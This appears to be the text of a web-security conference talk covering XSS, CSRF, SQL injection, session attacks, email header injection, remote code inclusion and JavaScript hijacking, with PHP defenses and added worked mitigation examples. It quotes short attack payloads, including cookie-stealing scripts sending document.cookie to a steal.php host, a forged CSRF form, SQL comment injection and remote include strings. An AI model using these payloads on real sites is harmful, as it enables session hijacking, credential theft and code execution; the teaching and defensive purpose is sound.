Evolution of Web Security
Chris Shiflett (@shiflett, shiflett.org)
Who am I?
Web developer from Brooklyn, NY, and founding member of Analog, a web design & development co-operative.
1. Fundamentals
Three Principles
Defense in depth: redundant safeguards are valuable.
Least privilege: grant as little freedom as possible.
Least complicated: complexity breeds mistakes.
Two Practices
Filter input: ensure data coming in is valid.
Escape output: ensure data going out is not misinterpreted.
Filter input. Escape output.
(Diagram: incoming data passes through the filter before it reaches the application; outgoing data passes through the escape step before it leaves.)
```php
<?php
$clean = array();

// Accept the name only if every character is a letter.
// ctype_alpha() is also false for the empty string.
if (ctype_alpha($_POST['name'])) {
    $clean['name'] = $_POST['name'];
} else {
    /* Error */
}
?>
```
```php
<?php
$clean = array();

// Whitelist via switch: only the three listed values are copied to $clean.
switch ($_POST['color']) {
    case 'red':
    case 'green':
    case 'blue':
        $clean['color'] = $_POST['color'];
        break;
    default:
        /* Error */
        break;
}
?>
```
```php
<?php
$clean = array();
$colors = array('red', 'green', 'blue');

// Whitelist via in_array(); the third argument forces strict (===) comparison
// so loose type juggling cannot match a value that is not in the list.
if (in_array($_POST['color'], $colors, true)) {
    $clean['color'] = $_POST['color'];
} else {
    /* Error */
}
?>
```
```php
<?php
$clean = array();
$colors = array();
$colors['red'] = '';
$colors['green'] = '';
$colors['blue'] = '';

// Whitelist via array keys: isset() is a cheap hash lookup.
if (isset($colors[$_POST['color']])) {
    $clean['color'] = $_POST['color'];
} else {
    /* Error */
}
?>
```
```php
<?php
$clean = array();

// Exactly five ASCII digits. \z rather than $ as the end anchor: $ also
// matches just before a trailing newline, so "12345\n" would otherwise pass.
if (preg_match('/^\d{5}\z/', $_POST['zip'])) {
    $clean['zip'] = $_POST['zip'];
} else {
    /* Error */
}
?>
```
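The one-liners above each check a single field that is assumed to be present and to be a string. The following is an added example, not code from the slides: it applies the same three checks (character type, whitelist, pattern) to several fields at once and also covers the two cases the one-liners skip, a field that is missing and a field submitted as an array (`color[]=red`). The function name `filter_input_fields`, the rule format and the request data are invented for illustration.

```php
<?php
// Added example: whitelist-style input filtering over a set of fields.
// Rule format (invented for this example): array(type, argument).

function filter_input_fields(array $input, array $rules): array
{
    $clean  = array();
    $errors = array();

    foreach ($rules as $field => $rule) {
        // A missing field, or one sent as an array, never reaches a check:
        // ctype_alpha() and friends expect a string.
        if (!isset($input[$field]) || !is_string($input[$field])) {
            $errors[$field] = 'missing or not a string';
            continue;
        }
        $value = $input[$field];

        switch ($rule[0]) {
            case 'alpha':   // letters only; false for the empty string
                $ok = ctype_alpha($value);
                break;
            case 'oneof':   // whitelist, strict comparison
                $ok = in_array($value, $rule[1], true);
                break;
            case 'pattern': // anchored with \z so a trailing newline is rejected
                $ok = preg_match($rule[1], $value) === 1;
                break;
            default:        // unknown rule type: fail closed
                $ok = false;
        }

        if ($ok) {
            $clean[$field] = $value;
        } else {
            $errors[$field] = 'invalid';
        }
    }

    return array('clean' => $clean, 'errors' => $errors);
}

$rules = array(
    'name'  => array('alpha'),
    'color' => array('oneof', array('red', 'green', 'blue')),
    'zip'   => array('pattern', '/^\d{5}\z/'),
);

// Constructed request data standing in for $_POST.
$post = array(
    'name'  => 'Chris',
    'color' => array('red'),   // color[]=red: an array where a string is expected
    'zip'   => "12345\n",      // passes /^\d{5}$/ but not /^\d{5}\z/
);

var_export(filter_input_fields($post, $rules));
```

With the constructed data only `name` reaches `$clean`; `color` is reported as "missing or not a string" and `zip` as "invalid". Only `$clean` is used from then on, which is the point of the `$clean` array convention on the slides.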
```php
<?php
/* Content-Type: text/html; charset=UTF-8 */
$html = array();

// Escape for the HTML context, with the character encoding stated explicitly
// so that it agrees with the Content-Type header the page sends.
$html['user'] = htmlentities($clean['user'], ENT_QUOTES, 'UTF-8');
echo "<p>Welcome, {$html['user']}.</p>";
?>
```
Exploits
Cross-Site Scripting
Cross-Site Request Forgeries
SQL Injection
Session Fixation
Session Hijacking
Email Injection
Remote Code Injection
Cross-Site Scripting
(Diagram: 1. the attacker gets script into HTML served by the target; 2. the victim's browser renders the target's page and runs it.)
```php
// Unescaped output: whatever arrives in ?user= is written straight into the page.
echo $_GET['user'];

// Request:  http://host/foo.php?user=%3Cscript%3E…
// Is equivalent to:
echo '<script>…';
```
Steal Cookies

```html
<script>document.location = 'http://host/steal.php?cookies=' + encodeURI(document.cookie);</script>
```
Steal Passwords

```html
<script>document.forms[0].action = 'http://host/steal.php';</script>
```
Steal Saved Passwords

```html
<form name="steal" action="http://host/steal.php">
    <input type="text" name="username" style="display: none" />
    <input type="password" name="password" style="display: none" />
    <input type="image" src="image.png" />
</form>
```
(The browser's password manager fills the hidden fields; clicking the image submits them to the attacker.)
Short & Simple

```html
<script src="http://host/evil.js"></script>
```
Character Encoding

```php
$string = "<script>alert('XSS');</script>";
$string = mb_convert_encoding($string, 'UTF-7');
// The UTF-7 form (+ADw-script+AD4-...) contains no < > & or quotes, so with no
// charset argument and no declared page encoding htmlentities() changes nothing,
// and a browser left to guess the encoding may decode it as UTF-7.
echo htmlentities($string);
```

Google XSS Example: http://shiflett.org/blog/2005/dec/google-xss-example
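The escape-output slide and the character-encoding slide are two halves of one rule: escape with an explicit charset, and make sure the page declares that same charset so the browser has nothing to guess. The following is an added example, not code from the slides, showing both halves plus the filter-side check that rejects input which is not well-formed in the declared encoding. The helper names `h()` and `clean_utf8()` and the sample inputs are constructed for illustration.

```php
<?php
// Added example: declare the encoding, reject malformed input, escape output.

// 1. Declare the encoding. With this header in place a UTF-7 payload is just
//    ASCII punctuation to the browser. (header() is a no-op on the CLI.)
header('Content-Type: text/html; charset=UTF-8');

// 2. Escape for the HTML body/attribute context, with the charset stated
//    explicitly so escaping and the declared page encoding agree.
//    ENT_SUBSTITUTE replaces any stray invalid sequence instead of returning ''.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// 3. Filter step: only well-formed UTF-8 is accepted as a string field.
function clean_utf8(string $s): ?string
{
    return mb_check_encoding($s, 'UTF-8') ? $s : null;
}

// Constructed inputs: a normal value, the UTF-7 trick from the slide,
// and an overlong byte sequence that is not valid UTF-8.
$samples = array(
    'plain'   => "Chris <shiflett> & \"co\"",
    'utf7'    => mb_convert_encoding("<script>alert('XSS');</script>", 'UTF-7', 'UTF-8'),
    'badutf8' => "Chris\xC0\xAF",
);

foreach ($samples as $label => $raw) {
    $clean = clean_utf8($raw);
    if ($clean === null) {
        echo "$label: rejected (not valid UTF-8)\n";
        continue;
    }
    // The UTF-7 payload survives escaping unchanged; it is harmless only
    // because the page has declared charset=UTF-8.
    echo "$label: " . h($clean) . "\n";
}
```

Run from the command line, `plain` comes out with `<`, `>`, `&` and the quotes encoded, `utf7` is echoed as the `+ADw-script+AD4-…` form, and `badutf8` is rejected before it reaches the escaping step at all.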
Stop It!
FIEO (filter input, escape output).
Use valid HTML: http://validator.w3.org/
Use existing solutions.
  PHP developers, use htmlentities() or htmlspecialchars().
  Make sure you indicate the character encoding!
Need to allow HTML? Use HTML Purifier, even if you're not using PHP: http://htmlpurifier.org/
Cross-Site Request Forgeries
(Diagram: 1. the attacker plants a request in content the victim views; 2. the victim's browser sends that request to the target, carrying the victim's credentials.)
CSRF
Because the request is sent by the victim's browser, CSRF can bypass:
  HTTP auth
  Session-based auth
  Firewalls
  etc.
Buy

```html
<form action="buy.php" method="post">
    <input type="hidden" name="isbn" value="059600656X" />
    <input type="submit" value="Buy" />
</form>
```

```http
POST /buy.php HTTP/1.1
Host: host
Cookie: PHPSESSID=1234
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

isbn=059600656X
```
Forging GET

```html
<img src="http://host/buy.php?isbn=059600656X" />
```

```http
GET /buy.php?isbn=059600656X HTTP/1.1
Host: host
Cookie: PHPSESSID=1234
```
Forging POST

```html
<iframe style="visibility: hidden" name="secret"></iframe>
<form name="buy" action="http://host/buy.php" method="post" target="secret">
    <input type="hidden" name="isbn" value="059600656X" />
</form>
<script type="text/javascript">document.buy.submit();</script>
```

```http
POST /buy.php HTTP/1.1
Host: host
Cookie: PHPSESSID=1234
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

isbn=059600656X
```
CSRF Exploits
Digg (fixed): http://4diggers.blogspot.com/
Amazon (fixed?): http://shiflett.org/amazon.php
Steal Cookies (Improved)

```html
<script>new Image().src = 'http://host/steal.php?cookies=' + encodeURI(document.cookie);</script>
```
(The cookie leaves in an image request, so the page is not navigated away and the victim sees nothing.)
Stop It!

```php
// Per-session anti-CSRF token. On PHP 7+, bin2hex(random_bytes(16)) is the
// stronger source; md5(uniqid(rand(), TRUE)) was the common idiom at the time.
$token = md5(uniqid(rand(), TRUE));
$_SESSION['token'] = $token;
$html['token'] = htmlentities($token, ENT_QUOTES, 'UTF-8');
```

```html
<input type="hidden" name="token" value="<?php echo $html['token']; ?>" />
```
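The slide issues the token and embeds it in the form; the other half, checking it when the form comes back, is what actually stops the forged GET and POST shown earlier. The following is an added example, not code from the slides, covering both halves. `csrf_token()`, `csrf_field()`, `csrf_verify()` and the stand-in `handle_buy()` are names invented here; buy.php's real logic is not shown.

```php
<?php
// Added example: issue, embed and verify an anti-CSRF token.
session_start();

function csrf_token(): string
{
    if (empty($_SESSION['token'])) {
        // random_bytes() (PHP 7+) in place of md5(uniqid(rand(), true)).
        $_SESSION['token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['token'];
}

function csrf_field(): string
{
    return '<input type="hidden" name="token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '" />';
}

// hash_equals() compares in constant time, so the token cannot be recovered
// byte by byte from response timing.
function csrf_verify(array $post): bool
{
    return isset($post['token'], $_SESSION['token'])
        && is_string($post['token'])
        && hash_equals($_SESSION['token'], $post['token']);
}

// Stand-in for buy.php: state changes only on a POST carrying a valid token.
function handle_buy(string $method, array $post): string
{
    // The <img src=...> forgery is a GET and fails here.
    if ($method !== 'POST') {
        return '405 Method Not Allowed';
    }
    // The hidden-form forgery is a POST but cannot know the token and fails here.
    if (!csrf_verify($post)) {
        return '403 Forbidden: bad or missing token';
    }
    return 'bought ' . htmlspecialchars($post['isbn'] ?? '', ENT_QUOTES, 'UTF-8');
}

// Constructed requests: the genuine form, a forged GET, a forged POST.
echo csrf_field(), "\n";
echo handle_buy('POST', array('isbn' => '059600656X', 'token' => csrf_token())), "\n";
echo handle_buy('GET',  array('isbn' => '059600656X')), "\n";
echo handle_buy('POST', array('isbn' => '059600656X', 'token' => 'guess')), "\n";
```

The same `csrf_verify()` check belongs on any endpoint that returns per-user data to a script, not just on forms; that is the sense in which auditing for CSRF also covers the JavaScript hijacking case discussed later in the deck.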
SQL Injection
(Diagram: 1. the attacker's input becomes part of the SQL the target builds; 2. the database executes it.)
```sql
SELECT count(*)
FROM users
WHERE username = '{$_POST['username']}'
AND password = '…'
```

Submitted username:

```
chris' /*
```

Resulting query (everything after the opening comment marker is ignored, so the password is never checked):

```sql
SELECT count(*)
FROM users
WHERE username = 'chris' /*'
AND password = '…'
```
Stop It!
FIEO (filter input, escape output).
Use prepared statements.
  PHP developers, use PDO.
addslashes() Versus mysql_real_escape_string(): http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string
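The following is an added example, not code from the slides: the login query from the previous slide written the vulnerable way and then as a PDO prepared statement, both run against an in-memory SQLite table constructed here (it needs the pdo_sqlite extension). The payload is the slide's `chris'` followed by a comment marker; SQLite's line comment is `--` rather than MySQL's `/*`. Function names and the table contents are invented for the example, and the password is stored in clear text only to mirror the slide's query.

```php
<?php
// Added example: string-built query versus PDO prepared statement.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
// For MySQL also set ATTR_EMULATE_PREPARES to false so the server, not the
// driver, does the parameter binding.
$db->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
$db->exec('CREATE TABLE users (username TEXT, password TEXT)');
$db->exec("INSERT INTO users VALUES ('chris', 'correct horse')");

// Vulnerable: the slide's pattern. With $user = "chris' --" the rest of the
// WHERE clause becomes a comment and the password is never compared.
function login_unsafe(PDO $db, string $user, string $pass): int
{
    $sql = "SELECT count(*) FROM users WHERE username = '$user' AND password = '$pass'";
    return (int) $db->query($sql)->fetchColumn();
}

// Safe: the statement is parsed before the values arrive, so the quote and
// the comment marker can only ever be compared as data.
function login_safe(PDO $db, string $user, string $pass): int
{
    $stmt = $db->prepare('SELECT count(*) FROM users WHERE username = :u AND password = :p');
    $stmt->execute(array(':u' => $user, ':p' => $pass));
    return (int) $stmt->fetchColumn();
}

$payload = "chris' --";

printf("unsafe, injected username: %d\n", login_unsafe($db, $payload, 'wrong'));
printf("safe,   injected username: %d\n", login_safe($db, $payload, 'wrong'));
printf("safe,   genuine login:     %d\n", login_safe($db, 'chris', 'correct horse'));
```

The first line prints 1 (login bypassed with a wrong password), the second prints 0, and the third prints 1: with the prepared statement the only way to get a match is to know the password.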
Session Fixation

```
http://host/login.php?PHPSESSID=1234
```
(The attacker chooses the identifier, gets the victim to log in with it, and then uses the same identifier.)
Stop It!
Regenerate the session identifier.
  PHP developers, session_regenerate_id(TRUE).
Do this whenever the privilege level changes.
Session Hijacking
Attacker impersonates a victim.
In PHP, by default, only requires a valid session identifier.
Session identifier obtained using:
  Prediction
  Capture
  Fixation
Stop It!
Understand how sessions work.
Minimize session identifier exposure.
  SSL
  Separate domain for embedded resources
Trending
  https://panopticlick.eff.org/
  More on this later…
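The fixation and hijacking slides together amount to a short checklist for PHP sessions: do not accept identifiers the server did not issue, keep the identifier out of URLs and away from script, send it only over SSL, and regenerate it on every privilege change. The following is an added example, not code from the slides, putting that checklist in one place. `login_user()` and `logout_user()` are stand-ins with a constructed credential check; the ini settings and cookie flags are standard PHP (`session.use_strict_mode` needs PHP 5.5.2 or later, the array form of `session_set_cookie_params()` PHP 7.3 or later).

```php
<?php
// Added example: session settings and login/logout steps against fixation
// and identifier exposure.

// Refuse identifiers the server did not issue: a fixed PHPSESSID=1234 in a
// link or cookie is discarded and a fresh one generated.
ini_set('session.use_strict_mode', '1');
// Accept the identifier from the cookie only, never from the URL.
ini_set('session.use_only_cookies', '1');
ini_set('session.use_trans_sid', '0');
// Keep the cookie away from script (the cookie-stealing XSS payloads above)
// and off plain HTTP.
session_set_cookie_params(array(
    'lifetime' => 0,
    'path'     => '/',
    'secure'   => true,
    'httponly' => true,
    'samesite' => 'Lax',
));
session_start();

function login_user(string $username, string $password): bool
{
    // Constructed credential check standing in for the real one.
    if (!($username === 'chris' && $password === 'correct horse')) {
        return false;
    }
    // Privilege level changed: discard the pre-login identifier so anything
    // an attacker fixed or captured before this point no longer names this
    // session. TRUE deletes the old session data as well.
    session_regenerate_id(true);
    $_SESSION['user'] = $username;
    return true;
}

function logout_user(): void
{
    $_SESSION = array();
    // Another privilege change: new identifier, old data gone.
    session_regenerate_id(true);
}

$before = session_id();
login_user('chris', 'correct horse');
$after = session_id();
echo $before === $after ? "identifier NOT regenerated\n" : "identifier regenerated on login\n";
logout_user();
```

Run on the command line the script reports that the identifier was regenerated; on a web server the same code also sends the new `Set-Cookie` with the `Secure` and `HttpOnly` flags.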
Email Injection

```php
mail('[email protected]', 'Feedback', '...', "From: {$_POST['email']}");
```

Submitted email address:

```
[email protected]\r\nBcc: [email protected]\r\nBcc: …
```

Resulting headers:

```
To: [email protected]
Subject: Feedback
From: [email protected]
Bcc: [email protected]
Bcc: …
```
Stop It!
FIEO (filter input, escape output).
  http://iamcal.com/publish/articles/php/parsing_email
  PHP developers, use ctype_print() as defense in depth.
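The following is an added example, not code from the slides, of the filter that belongs in front of the `mail()` call above: the address must be a single printable string (so no CR or LF can start a new header) and must parse as one email address. `clean_email()` and `send_feedback()` are invented names, the addresses are constructed, and `mail()` itself is not called so the script runs offline.

```php
<?php
// Added example: filter the From address before it becomes a mail header.

// A header value may never contain a line break or any other control
// character; ctype_print() enforces that. FILTER_VALIDATE_EMAIL then
// rejects anything that is not a single, well-formed address.
function clean_email(string $value): ?string
{
    if (!ctype_print($value)) {
        return null;   // \r, \n, \0 and other control bytes all fail here
    }
    if (filter_var($value, FILTER_VALIDATE_EMAIL) === false) {
        return null;
    }
    return $value;
}

function send_feedback(string $from, string $body): bool
{
    $clean = clean_email($from);
    if ($clean === null) {
        return false;  // refuse; do not silently substitute a default header
    }
    // Where the slide calls mail(...), only the header it would receive is
    // printed here.
    echo "From: $clean\n";
    return true;
}

// Constructed inputs: a genuine address and the slide's Bcc-injecting one.
$genuine = 'chris@example.org';
$forged  = "chris@example.org\r\nBcc: victim1@example.com\r\nBcc: victim2@example.com";

var_dump(send_feedback($genuine, 'hello'));
var_dump(send_feedback($forged, 'spam'));
```

The genuine address is accepted and printed as a single `From:` header; the forged one fails at `ctype_print()` on the first `\r` and `send_feedback()` returns `false`.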
Remote Code Injection
(Diagram: the attacker supplies the location of code; the target includes and runs it.)
```php
include "{$_COOKIE['type']}.php";

// Cookie: type=http://host/inject.inc?
// The trailing ? turns the appended ".php" into a query string, so the
// include resolves to:
include "http://host/inject.inc?.php";
```
Remote Code Injection
This example exploits allow_url_fopen.
PHP 5 has allow_url_include.
  By default, allow_url_include is disabled.
  (Since PHP 5.2.0 a remote include requires allow_url_include; allow_url_fopen on its own no longer suffices.)
```php
include "{$_GET['type']}.php";
```

```http
POST /script.php?type=php://input%00 HTTP/1.1
Host: host
Content-Type: application/x-www-form-urlencoded
Content-Length: ?

?
```

```php
include "php://input";
```
(The %00 null byte cuts the path off before the appended ".php" on PHP versions before 5.3.4, which reject null bytes in include paths; php://input then makes the POST body the included code. The php://input wrapper is also governed by allow_url_include.)
Stop It!
FIEO (filter input, escape output).
  If at all possible, use a white list.
2. Emerging Trends
Ajax
"The name is shorthand for Asynchronous JavaScript + XML, and it represents a fundamental shift in what's possible on the Web."
— Jesse James Garrett
Ajax
"Client-side techniques & technologies that allow two-way communication between the client and the server without reloading the page."
Cross-Domain Ajax
(Diagram: script running in the victim's browser talks to the target.)
1. XMLHttpRequest
2. HTML form + victim's token
3. XMLHttpRequest + victim's token
XSS + Ajax + CSRF
(Diagram: script injected into the target via XSS runs in the victim's browser on the target's own origin, so same-origin XMLHttpRequest is available to it.)
1. XMLHttpRequest (fetch a page of the target as the victim)
2. HTML form + victim's token (the response contains the victim's anti-CSRF token)
3. XMLHttpRequest + victim's token (submit the forged request with that token)
Worms
XSS is a perfect platform for CSRF.
CSRF attacks can exploit XSS vulnerabilities.
Victims can become attackers.
Rinse. Repeat.
Browser Hijacking: http://shiflett.org/blog/2006/oct/using-csrf-for-browser-hijacking
Myspace CSRF and XSS Worm (Samy): http://shiflett.org/blog/2005/oct/myspace-csrf-and-xss-worm-samy
Cross-Domain Ajax
Thanks, Flash!

```xml
<cross-domain-policy>
    <allow-access-from domain="*"/>
</cross-domain-policy>
```
(A crossdomain.xml like this lets a Flash movie served from any origin make requests to the site, and read the responses, with the visitor's cookies attached.)
Cross-Domain Ajax

Site            domain="*"   API domain   Vulnerable?
yahoo.com       No           n/a          No
youtube.com     No           n/a          No
api.flickr.com  Yes          Yes          No
adobe.com       Yes          No           Yes

(A wildcard policy on a domain that only serves an API and holds no sessions exposes nothing; the same policy on a domain with logged-in users does.)
JavaScript Hijacking
(Diagram: the attacker's page loads the target's JSON response as a script in the victim's browser, which sends the victim's cookies; the data then flows back to the attacker.)
```html
<script src="http://host/json.php"></script>
```

```json
[{"email": "[email protected]"}]
```

JavaScript Hijacking Demo: http://mochikit.com/fortify_fud/
JavaScript Hijacking
"If you audit your application for CSRF flaws, you've defeated this attack. Moreover, the well-known, pre-existing exploits for CSRF are actually worse than this attack."
— Thomas Ptacek
3. Ideas for the Future
Trending
Panopticlick: https://panopticlick.eff.org/
"When you visit a web site, you are allowing that site to access a lot of information about your computer's configuration. Combined, this information can create a kind of fingerprint — a signature that could be used to identify you and your computer."
Trending
"Not the intent, but Panopticlick from @eff would be useful for preventing session hijacking."
— http://twitter.com/shiflett/status/8562663352
Trending
Establish trends to help detect anomalies.
Trends can be based on identity or behavior.
Trending is imperfect; use as defense in depth.
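The following is an added example, not code from the slides, of an identity-based trend in the sense of the three points above: a fingerprint of request attributes a client normally keeps stable, recorded when the session is established and compared on every request afterwards. The attribute set, the function names (`request_fingerprint`, `establish_trend`, `check_trend`) and the escalation policy (ask for the password again, drop the session only if the anomaly persists) are choices made here, not the slides'; the two requests are constructed.

```php
<?php
// Added example: fingerprint-based anomaly check for an established session.

function request_fingerprint(array $server): string
{
    // Request headers are attacker-controlled, so this is a heuristic: a
    // thief who copied the cookie must also copy these, which raises the bar
    // but does not close it. Defense in depth, never the only check.
    $parts = array(
        $server['HTTP_USER_AGENT']      ?? '',
        $server['HTTP_ACCEPT_LANGUAGE'] ?? '',
        $server['HTTP_ACCEPT_ENCODING'] ?? '',
    );
    return hash('sha256', implode("\n", $parts));
}

// Record the trend when the session gains privileges (e.g. at login).
function establish_trend(array &$session, array $server): void
{
    $session['fingerprint'] = request_fingerprint($server);
    $session['mismatches']  = 0;
}

// Returns 'ok', 'reauth' or 'drop' for the current request.
function check_trend(array &$session, array $server): string
{
    if (!isset($session['fingerprint'])) {
        return 'ok';   // nothing recorded yet, nothing to compare against
    }
    if (hash_equals($session['fingerprint'], request_fingerprint($server))) {
        return 'ok';
    }
    // A mismatch is an anomaly, not proof: browsers update, users change
    // language settings. Ask for the password again; escalate to dropping
    // the session only if the anomaly persists.
    $session['mismatches'] = ($session['mismatches'] ?? 0) + 1;
    return $session['mismatches'] > 3 ? 'drop' : 'reauth';
}

// Constructed requests: the victim's browser, then an attacker replaying the
// stolen cookie from a different client.
$victim = array(
    'HTTP_USER_AGENT'      => 'Mozilla/5.0 (X11; Linux) Firefox/3.6',
    'HTTP_ACCEPT_LANGUAGE' => 'en-US,en;q=0.5',
    'HTTP_ACCEPT_ENCODING' => 'gzip,deflate',
);
$attacker = array(
    'HTTP_USER_AGENT'      => 'curl/7.19',
    'HTTP_ACCEPT_LANGUAGE' => '',
    'HTTP_ACCEPT_ENCODING' => '',
);

$session = array();   // stands in for $_SESSION
establish_trend($session, $victim);
echo "victim:   ", check_trend($session, $victim), "\n";
echo "attacker: ", check_trend($session, $attacker), "\n";
```

The victim's own request is reported `ok` and the replay from the other client `reauth`; a fourth consecutive mismatch would return `drop`. Which attributes to include is a trade-off between false positives and how much a hijacker has to reproduce, which is why the slide calls trending imperfect.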
Security-Centered Design
Webstock 2010
Thursday, 18 February, after lunch (13:25)
Illot Theatre
Slides
http://shiflett.org/evolution-of-web-security.pdf
http://slideshare.net/shiflett
Feedback?
Follow me on Twitter: @shiflett
Comment on my blog: shiflett.org
Email me: [email protected]
Work with me: analog.coop